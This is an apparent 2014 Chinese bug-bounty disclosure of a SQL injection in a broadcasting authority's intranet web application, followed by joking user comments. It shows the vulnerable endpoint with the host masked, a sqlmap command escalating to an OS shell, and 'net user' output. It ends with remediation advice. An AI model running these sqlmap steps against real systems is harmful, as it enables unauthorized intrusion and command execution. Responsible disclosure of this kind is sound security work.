一个SQL注入可致广电总局内网渗透

一个高权限的注入点，直接可导致命令执行，可添加系统管理员，并且3389对外开放，由于其操作的敏感性，未进一步深入测试。

sql注入点：

http://**.**.**.**/wszb/filemanage/ajaxGetDepartList.aspx?departcode=%27

sqlmap.py -u "http://**.**.**.**/wszb/filemanage/ajaxGetDep
 artList.aspx?departcode=" --is-dba --dbs

数据就不看了，直接--os-shell

os-shell> net user

----------------------------------------------------------------
 Administrator            ASPNET                   cncert
 cncert1                  cncerttest               Guest
 ---

这几个用户名不知道是cncert的还是其他人添加的...请排查。

看下ip证明是内网

并且开放了3389

只证明危害性，未进行深入测试，点到为止。

对相关参数进行过滤，检查服务器是否被入侵。

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-09-23 08:40

厂商回复：

最新状态：

暂无

1. 2014-09-18 17:54 | 魇 ( 普通白帽子 | Rank:1218 漏洞数:107 | 传闻中魇是一个惊世奇男子， 但是除了他华...)

   1

   广电可怕

   1# 回复此人

2. 2014-09-18 17:55 | Coody ( 核心白帽子 | Rank:1809 漏洞数:214 | 不接单、不黑产；如遇冒名顶替接单收徒、绝...)

   0

   您的水表到了。。。。。

   2# 回复此人

3. 2014-09-18 18:05 | 子丑寅卯辰 ( 路人 | Rank:2 漏洞数:1 | 子丑寅卯辰巳午未申酉戌亥)

   1

   光腚总菊被爆菊了。。。

   3# 回复此人

4. 2014-09-18 18:16 | 浮萍 ( 普通白帽子 | Rank:1077 漏洞数:217 )

   1

   停电了，是不是你搞的。网吧老板准备找人打你

   4# 回复此人

5. 2014-09-18 18:34 | zzR ( 核心白帽子 | Rank:1408 漏洞数:127 | 东方红＊＊联盟欢迎你－0-)

   1

   长期出租此id，谢谢合作

   5# 回复此人

6. 2014-09-18 18:35 | 第四维度 ( 实习白帽子 | Rank:90 漏洞数:45 | 将点成线...)

   0

   爆的好

   6# 回复此人

7. 2014-09-18 19:34 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 看人生万般无奈，看世间千姿百态...)

   0

   查电表啦。开门，不然停电

   7# 回复此人

8. 2014-09-18 19:36 | xyang ( 普通白帽子 | Rank:350 漏洞数:82 | stay hungry stay foolish)

   1

   niniu

   8# 回复此人

9. 2014-09-18 19:37 | bey0nd ( 普通白帽子 | Rank:941 漏洞数:148 | 相忘于江湖，不如相濡以沫)

   1

   光腚总菊

   9# 回复此人

10. 2014-09-19 08:44 | sdj ( 实习白帽子 | Rank:45 漏洞数:6 | 最神奇的一群人，智慧低调又内敛，俗称马甲...)

    0

    咚咚咚

    10# 回复此人

11. 2014-09-19 09:59 | 爱Gail ( 普通白帽子 | Rank:237 漏洞数:38 | 爱漏洞、爱编程、爱旅游、爱Gail)

    1

    支持爆掉

    11# 回复此人

12. 2014-11-03 13:19 | firetheone ( 路人 | Rank:0 漏洞数:1 | 是个暂时de新人)

    1

    @浮萍 关电站什么事

    12# 回复此人